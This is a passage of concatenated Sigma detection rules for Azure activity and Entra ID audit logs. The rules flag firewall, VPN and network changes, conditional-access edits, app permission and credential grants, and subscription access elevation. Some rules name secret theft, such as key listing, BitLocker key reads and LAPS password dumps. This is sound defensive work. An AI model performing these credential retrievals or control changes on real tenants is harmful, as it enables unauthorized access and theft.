- MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION
- MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE
condition: selection
falsepositives:
- Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml
================================================
title: Azure Firewall Rule Configuration Modified or Deleted
id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067
status: test
description: Identifies when a Firewall Rule Configuration is Modified or Deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE
- MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE
- MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE
- MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE
condition: selection
falsepositives:
- Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_network_p2s_vpn_modified_or_deleted.yml
================================================
title: Azure Point-to-site VPN Modified or Deleted
id: d9557b75-267b-4b43-922f-a775e2d1f792
status: test
description: Identifies when a Point-to-site VPN is Modified or Deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE
- MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE
- MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION
- MICROSOFT.NETWORK/P2SVPNGATEWAYS/GENERATEVPNPROFILE/ACTION
- MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION
- MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE
condition: selection
falsepositives:
- Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml
================================================
title: Azure Network Security Configuration Modified or Deleted
id: d22b4df4-5a67-4859-a578-8c9a0b5af9df
status: test
description: Identifies when a network security configuration is modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE
- MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE
- MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE
- MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/DELETE
- MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION
- MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE
condition: selection
falsepositives:
- Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_network_virtual_device_modified_or_deleted.yml
================================================
title: Azure Virtual Network Device Modified or Deleted
id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3
status: test
description: |
Identifies when a virtual network device is being modified or deleted.
This can be a network interface, network virtual appliance, virtual hub, or virtual router.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE
- MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE
- MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE
- MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION
- MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE
- MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE
- MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE
- MICROSOFT.NETWORK/VIRTUALHUBS/DELETE
- MICROSOFT.NETWORK/VIRTUALHUBS/WRITE
- MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE
- MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE
condition: selection
falsepositives:
- Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_new_cloudshell_created.yml
================================================
title: Azure New CloudShell Created
id: 72af37e2-ec32-47dc-992b-bc288a2708cb
status: test
description: Identifies when a new cloudshell is created inside of Azure portal.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer
date: 2021-09-21
modified: 2022-08-23
tags:
- attack.execution
- attack.t1059
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName: MICROSOFT.PORTAL/CONSOLES/WRITE
condition: selection
falsepositives:
- A new cloudshell may be created by a system administrator.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_owner_removed_from_application_or_service_principal.yml
================================================
title: Azure Owner Removed From Application or Service Principal
id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6
status: test
description: Identifies when a owner is was removed from a application or service principal in Azure.
references:
- https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
author: Austin Songer @austinsonger
date: 2021-09-03
modified: 2022-10-09
tags:
- attack.defense-evasion
logsource:
product: azure
service: activitylogs
detection:
selection:
properties.message:
- Remove owner from service principal
- Remove owner from application
condition: selection
falsepositives:
- Owner being removed may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_rare_operations.yml
================================================
title: Rare Subscription-level Operations In Azure
id: c1182e02-49a3-481c-b3de-0fadc4091488
status: test
description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.
references:
- https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml
author: sawwinnnaung
date: 2020-05-07
modified: 2023-10-11
tags:
- attack.t1003
- attack.credential-access
logsource:
product: azure
service: activitylogs
detection:
keywords:
- Microsoft.DocumentDB/databaseAccounts/listKeys/action
- Microsoft.Maps/accounts/listKeys/action
- Microsoft.Media/mediaservices/listKeys/action
- Microsoft.CognitiveServices/accounts/listKeys/action
- Microsoft.Storage/storageAccounts/listKeys/action
- Microsoft.Compute/snapshots/write
- Microsoft.Network/networkSecurityGroups/write
condition: keywords
falsepositives:
- Valid change
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_service_principal_created.yml
================================================
title: Azure Service Principal Created
id: 0ddcff6d-d262-40b0-804b-80eb592de8e3
status: test
description: Identifies when a service principal is created in Azure.
references:
- https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
author: Austin Songer @austinsonger
date: 2021-09-02
modified: 2022-10-09
tags:
- attack.defense-evasion
logsource:
product: azure
service: activitylogs
detection:
selection:
properties.message: 'Add service principal'
condition: selection
falsepositives:
- Service principal being created may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_service_principal_removed.yml
================================================
title: Azure Service Principal Removed
id: 448fd1ea-2116-4c62-9cde-a92d120e0f08
status: test
description: Identifies when a service principal was removed in Azure.
references:
- https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy
author: Austin Songer @austinsonger
date: 2021-09-03
modified: 2022-10-09
tags:
- attack.defense-evasion
logsource:
product: azure
service: activitylogs
detection:
selection:
properties.message: Remove service principal
condition: selection
falsepositives:
- Service principal being removed may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_subscription_permissions_elevation_via_activitylogs.yml
================================================
title: Azure Subscription Permission Elevation Via ActivityLogs
id: 09438caa-07b1-4870-8405-1dbafe3dad95
status: test
description: |
Detects when a user has been elevated to manage all Azure Subscriptions.
This change should be investigated immediately if it isn't planned.
This setting could allow an attacker access to Azure subscriptions in your environment.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization
author: Austin Songer @austinsonger
date: 2021-11-26
modified: 2022-08-23
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078.004
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName: MICROSOFT.AUTHORIZATION/ELEVATEACCESS/ACTION
condition: selection
falsepositives:
- If this was approved by System Administrator.
level: high
================================================
FILE: rules/cloud/azure/activity_logs/azure_suppression_rule_created.yml
================================================
title: Azure Suppression Rule Created
id: 92cc3e5d-eb57-419d-8c16-5c63f325a401
status: test
description: Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer
date: 2021-08-16
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName: MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE
condition: selection
falsepositives:
- Suppression Rule being created may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_virtual_network_modified_or_deleted.yml
================================================
title: Azure Virtual Network Modified or Deleted
id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f
status: test
description: Identifies when a Virtual Network is modified or deleted in Azure.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName|startswith:
- MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/
- MICROSOFT.NETWORK/VIRTUALNETWORKS/
operationName|endswith:
- /WRITE
- /DELETE
condition: selection
falsepositives:
- Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/activity_logs/azure_vpn_connection_modified_or_deleted.yml
================================================
title: Azure VPN Connection Modified or Deleted
id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3
status: test
description: Identifies when a VPN connection is modified or deleted.
references:
- https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
author: Austin Songer @austinsonger
date: 2021-08-08
modified: 2022-08-23
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
operationName:
- MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE
- MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE
condition: selection
falsepositives:
- VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml
================================================
title: CA Policy Removed by Non Approved Actor
id: 26e7c5e2-6545-481e-b7e6-050143459635
status: test
description: Monitor and alert on conditional access changes where non approved actor removed CA Policy.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
author: Corissa Koopmans, '@corissalea'
date: 2022-07-19
tags:
- attack.privilege-escalation
- attack.credential-access
- attack.defense-evasion
- attack.persistence
- attack.t1548
- attack.t1556
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Delete conditional access policy
condition: selection
falsepositives:
- Misconfigured role permissions
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml
================================================
title: CA Policy Updated by Non Approved Actor
id: 50a3c7aa-ec29-44a4-92c1-fce229eef6fc
status: test
description: Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access
author: Corissa Koopmans, '@corissalea'
date: 2022-07-19
modified: 2024-05-28
tags:
- attack.privilege-escalation
- attack.credential-access
- attack.defense-evasion
- attack.persistence
- attack.t1548
- attack.t1556
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Update conditional access policy
condition: selection
falsepositives:
- Misconfigured role permissions
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml
================================================
title: New CA Policy by Non-approved Actor
id: 0922467f-db53-4348-b7bf-dee8d0d348c6
status: test
description: Monitor and alert on conditional access changes.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure
author: Corissa Koopmans, '@corissalea'
date: 2022-07-18
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.t1548
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Add conditional access policy
condition: selection
falsepositives:
- Misconfigured role permissions
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml
================================================
title: Account Created And Deleted Within A Close Time Frame
id: 6f583da0-3a90-4566-a4ed-83c09fe18bbf
status: test
description: Detects when an account was created and deleted in a short period of time.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts
author: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton
date: 2022-08-11
modified: 2022-08-18
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message:
- Add user
- Delete user
Status: Success
condition: selection
falsepositives:
- Legit administrative action
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml
================================================
title: Bitlocker Key Retrieval
id: a0413867-daf3-43dd-9245-734b3a787942
status: test
description: Monitor and alert for Bitlocker key retrieval.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval
author: Michael Epping, '@mepples21'
date: 2022-06-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
Category: KeyManagement
OperationName: Read BitLocker key
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_ad_certificate_based_authencation_enabled.yml
================================================
title: Certificate-Based Authentication Enabled
id: c2496b41-16a9-4016-a776-b23f8910dc58
status: test
description: Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.
references:
- https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f
- https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/
author: Harjot Shah Singh, '@cyb3rjy0t'
date: 2024-03-26
tags:
- attack.defense-evasion
- attack.credential-access
- attack.persistence
- attack.privilege-escalation
- attack.t1556
logsource:
product: azure
service: auditlogs
detection:
selection:
OperationName: 'Authentication Methods Policy Update'
TargetResources.modifiedProperties|contains: 'AuthenticationMethodsPolicy'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml
================================================
title: Changes to Device Registration Policy
id: 9494bff8-959f-4440-bbce-fb87a208d517
status: test
description: Monitor and alert for changes to the device registration policy.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy
author: Michael Epping, '@mepples21'
date: 2022-06-28
tags:
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1484
logsource:
product: azure
service: auditlogs
detection:
selection:
Category: 'Policy'
ActivityDisplayName: 'Set device registration policies'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml
================================================
title: Guest Users Invited To Tenant By Non Approved Inviters
id: 4ad97bf5-a514-41a4-abd3-4f3455ad4865
status: test
description: Detects guest users being invited to tenant by non-approved inviters
references:
- https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins
author: MikeDuddington, '@dudders1'
date: 2022-07-28
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078
logsource:
product: azure
service: auditlogs
detection:
selection:
Category: 'UserManagement'
OperationName: 'Invite external user'
filter:
InitiatedBy|contains: ''
condition: selection and not filter
falsepositives:
- If this was approved by System Administrator.
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_ad_new_root_ca_added.yml
================================================
title: New Root Certificate Authority Added
id: 4bb80281-3756-4ec8-a88e-523c5a6fda9e
status: test
description: Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.
references:
- https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f
- https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/
author: Harjot Shah Singh, '@cyb3rjy0t'
date: 2024-03-26
tags:
- attack.defense-evasion
- attack.credential-access
- attack.persistence
- attack.privilege-escalation
- attack.t1556
logsource:
product: azure
service: auditlogs
detection:
selection:
OperationName: 'Set Company Information'
TargetResources.modifiedProperties.newValue|contains: 'TrustedCAsForPasswordlessAuth'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml
================================================
title: Users Added to Global or Device Admin Roles
id: 11c767ae-500b-423b-bae3-b234450736ed
status: test
description: Monitor and alert for users added to device admin roles.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles
author: Michael Epping, '@mepples21'
date: 2022-06-28
tags:
- attack.persistence
- attack.initial-access
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
Category: RoleManagement
OperationName|contains|all:
- 'Add'
- 'member to role'
TargetResources|contains:
- '7698a772-787b-4ac8-901f-60d6b08affd2'
- '62e90394-69f5-4237-9190-012177145e10'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml
================================================
title: Application AppID Uri Configuration Changes
id: 1b45b0d1-773f-4f23-aedc-814b759563b1
status: test
description: Detects when a configuration change is made to an applications AppID URI.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed
author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
date: 2022-06-02
tags:
- attack.initial-access
- attack.defense-evasion
- attack.persistence
- attack.credential-access
- attack.privilege-escalation
- attack.t1552
- attack.t1078.004
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message:
- Update Application
- Update Service principal
condition: selection
falsepositives:
- When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event.
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_credential_added.yml
================================================
title: Added Credentials to Existing Application
id: cbb67ecc-fb70-4467-9350-c910bdf7c628
status: test
description: Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials
author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
date: 2022-05-26
modified: 2025-07-18
tags:
- attack.privilege-escalation
- attack.t1098.001
- attack.persistence
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message:
- Update application – Certificates and secrets management
- Update Service principal/Update Application
condition: selection
falsepositives:
- When credentials are added/removed as part of the normal working hours/workflows
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml
================================================
title: Delegated Permissions Granted For All Users
id: a6355fbe-f36f-45d8-8efc-ab42465cbc52
status: test
description: Detects when highly privileged delegated permissions are granted on behalf of all users
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022-07-28
tags:
- attack.credential-access
- attack.t1528
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Add delegated permission grant
condition: selection
falsepositives:
- When the permission is legitimately needed for the app
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml
================================================
title: End User Consent
id: 9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a
status: test
description: Detects when an end user consents to an application
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022-07-28
tags:
- attack.credential-access
- attack.t1528
logsource:
product: azure
service: auditlogs
detection:
selection:
ConsentContext.IsAdminConsent: 'false'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml
================================================
title: End User Consent Blocked
id: 7091372f-623c-4293-bc37-20c32b3492be
status: test
description: Detects when end user consent is blocked due to risk-based consent.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022-07-10
tags:
- attack.credential-access
- attack.t1528
logsource:
product: azure
service: auditlogs
detection:
selection:
failure_status_reason: 'Microsoft.online.Security.userConsentBlockedForRiskyAppsExceptions'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_owner_added.yml
================================================
title: Added Owner To Application
id: 74298991-9fc4-460e-a92e-511aa60baec1
status: test
description: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner
author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
date: 2022-06-02
tags:
- attack.t1552
- attack.credential-access
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Add owner to application
condition: selection
falsepositives:
- When a new application owner is added by an administrator
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml
================================================
title: App Granted Microsoft Permissions
id: c1d147ae-a951-48e5-8b41-dcd0170c7213
status: test
description: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022-07-10
tags:
- attack.credential-access
- attack.t1528
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message:
- Add delegated permission grant
- Add app role assignment to service principal
condition: selection
falsepositives:
- When the permission is legitimately needed for the app
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml
================================================
title: App Granted Privileged Delegated Or App Permissions
id: 5aecf3d5-f8a0-48e7-99be-3a759df7358f
related:
- id: ba2a7c80-027b-460f-92e2-57d113897dbc
type: obsolete
status: test
description: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022-07-28
modified: 2023-03-29
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1098.003
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Add app role assignment to service principal
condition: selection
falsepositives:
- When the permission is legitimately needed for the app
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_role_added.yml
================================================
title: App Assigned To Azure RBAC/Microsoft Entra Role
id: b04934b2-0a68-4845-8a19-bdfed3a68a7a
status: test
description: Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022-07-19
modified: 2024-11-04
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1098.003
logsource:
product: azure
service: auditlogs
detection:
selection:
targetResources.type: 'Service Principal'
properties.message:
- Add member to role
- Add eligible member to role
- Add scoped member to role
condition: selection
falsepositives:
- When the permission is legitimately needed for the app
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml
================================================
title: Application URI Configuration Changes
id: 0055ad1f-be85-4798-83cf-a6da17c993b3
status: test
description: |
Detects when a configuration change is made to an applications URI.
URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes
author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
date: 2022-06-02
tags:
- attack.initial-access
- attack.defense-evasion
- attack.t1528
- attack.t1078.004
- attack.persistence
- attack.credential-access
- attack.privilege-escalation
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Update Application Sucess- Property Name AppAddress
condition: selection
falsepositives:
- When and administrator is making legitimate URI configuration changes to an application. This should be a planned event.
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml
================================================
title: Windows LAPS Credential Dump From Entra ID
id: a4b25073-8947-489c-a8dd-93b41c23f26d
status: test
description: Detects when an account dumps the LAPS password from Entra ID.
references:
- https://twitter.com/NathanMcNulty/status/1785051227568632263
- https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/
- https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487
author: andrewdanis
date: 2024-06-26
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098.005
logsource:
product: azure
service: auditlogs
detection:
selection:
category: 'Device'
activityType|contains: 'Recover device local administrator password'
additionalDetails.additionalInfo|contains: 'Successfully recovered local credential by device id'
condition: selection
falsepositives:
- Approved activity performed by an Administrator.
level: high
================================================
FILE: rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml
================================================
title: Change to Authentication Method
id: 4d78a000-ab52-4564-88a5-7ab5242b20c7
status: test
description: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
references:
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts
author: AlertIQ
date: 2021-10-10
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.credential-access
- attack.t1556
- attack.persistence
- attack.defense-evasion
- attack.t1098
logsource:
product: azure
service: auditlogs
detection:
selection:
LoggedByService: 'Authentication Methods'
Category: 'UserManagement'
OperationName: 'User registered security info'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/cloud/azure/audit_logs/azure_federation_modified.yml
================================================
title: Azure Domain Federation Settings Modified
id: 352a54e1-74ba-4929-9d47-8193d67aba1e
status: test
description: Identifies when an user or application modified the federation settings on the domain.
references:
- https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes
author: Austin Songer
date: 2021-09-06
modified: 2022-06-08
tags:
- attack.privilege-escalation
- attack.persistence
- attack.defense-evasion
- attack.initial-access
- attack.t1078
logsource:
product: azure
service: auditlogs
detection:
selection:
ActivityDisplayName: Set federation settings on domain
condition: selection
falsepositives:
- Federation Settings being modified or deleted may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
